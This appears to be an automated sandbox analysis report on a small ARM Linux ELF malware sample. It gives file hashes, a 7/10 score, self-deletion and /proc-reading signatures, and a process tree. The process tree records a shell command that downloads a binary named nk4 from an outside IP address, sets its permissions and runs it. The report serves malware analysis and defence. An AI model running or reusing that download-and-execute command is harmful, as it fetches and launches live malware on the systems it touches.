Analysis
-
max time kernel
9s -
max time network
9s -
platform
debian-9_armhf -
resource
debian9-armhf-20231221-en -
resource tags
-
submitted
13/02/2024, 05:41
General
-
Target
dd61cdc5787316e9063bdc1f19d5d8f4f26b0fbac3cc0bef25bcaf0145bcfb9d.elf
-
Size
12KB
-
MD5
709a6919470ba9f85f73a6d5f9012f29
-
SHA1
421b2334cdab45fd4aae4730d925b9f44e6cefcc
-
SHA256
dd61cdc5787316e9063bdc1f19d5d8f4f26b0fbac3cc0bef25bcaf0145bcfb9d
-
SHA512
cc35a4a68ce6138992aaf2ae51cf22572491603fdca8a93a7e0f3d3f97dc2e564978f0bac82c0e893f8f0f8889d6b819e6060fae7e4bb9e8d1db3231d5bd0f5d
-
SSDEEP
384:4LqlevlSlF/BpSQo7fhTp/ftBqyYdY2pACn:RF/DsdRxt2pPn
Score
7/10
Malware Config
Signatures
-
Deletes itself 1 IoCs
-
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.
Processes
-
/tmp/dd61cdc5787316e9063bdc1f19d5d8f4f26b0fbac3cc0bef25bcaf0145bcfb9d.elf/tmp/dd61cdc5787316e9063bdc1f19d5d8f4f26b0fbac3cc0bef25bcaf0145bcfb9d.elf1⤵
- Deletes itself
- Reads runtime system information
-
/bin/shsh -c "wget http://198.98.51.91/abdagoodamagalu/nk4; chmod 777 *; ./nk4 wget.echo.telnet.arm"2⤵
-
/usr/bin/wgetwget http://198.98.51.91/abdagoodamagalu/nk43⤵
-
-
/bin/chmodchmod 777 systemd-private-dc369b198c8d4397b28a5f39def6c4ce-systemd-timedated.service-J73Pp13⤵
-
-
/tmp/nk4./nk4 wget.echo.telnet.arm3⤵
-
-